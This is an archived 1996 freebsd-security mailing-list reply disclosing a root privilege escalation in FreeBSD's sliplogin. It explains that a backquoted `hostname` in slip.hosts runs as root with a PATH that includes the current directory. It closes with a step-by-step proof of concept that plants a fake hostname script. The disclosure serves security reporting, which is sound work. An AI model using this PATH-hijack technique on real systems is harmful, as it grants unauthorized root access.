Date: Mon, 12 Feb 1996 02:36:18 -0800 From: Michael Constant <mconst@ocf.Berkeley.EDU> To: mconst@csua.berkeley.edu, nate@sri.MT.net Cc: freebsd-security@freebsd.org Subject: Re: sliplogin hole? Message-ID: <199602121036.CAA23693@maelstrom.Berkeley.EDU>
next in thread | raw e-mail | index | archive | help
> > The sliplogin(8) manpage recommends using lines of the following form > > in /etc/sliphome/slip.hosts: > > > > Sfoo `hostname` foo netmask > > > > The problem with this is that the `hostname` portion is passed directly > > to the shell, without any processing -- as root. This means J. Random > > Slip-User can create a script called ~/bin/hostname that does whatever > > he wants, and (as long as ~/bin is before /bin in his path) his script > > will be run as root the next time he types "sliplogin foo". > > Except that the path supplied to sliplogin is the standard unix > path (PATH=:/bin:/usr/bin), which doesn't use anything from the user's > home directory (unless it was explicitly set in the shell script. Well, "PATH=:/bin:/usr/bin" contains the current directory ( . ) which is just as insecure as not changing the path at all :-) But thanks for pointing out my misconception. The exploit as I stated it does work; it's written out in full below, in case I didn't explain it clearly in my original letter. > Also, if you are concerned about security, you don't allow your > slip-login users to create/modify any of their slip files, which is easy > to do as long as you don't give them the same uid's for both shell login > and slip login accounts and use paranoid permissions on both accounts. This will work, as long as the shell user is not allowed to run sliplogin. Otherwise, the exploit stands: jrl@host% cd ~/bin jrl@host% cat > hostname #! /bin/sh touch /etc/i-am-root /bin/hostname ^D jrl@host% chmod 755 hostname jrl@host% sliplogin Sjrl starting slip login for Sjrl ... and by this point, the deed is done. - Michael Constant
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199602121036.CAA23693>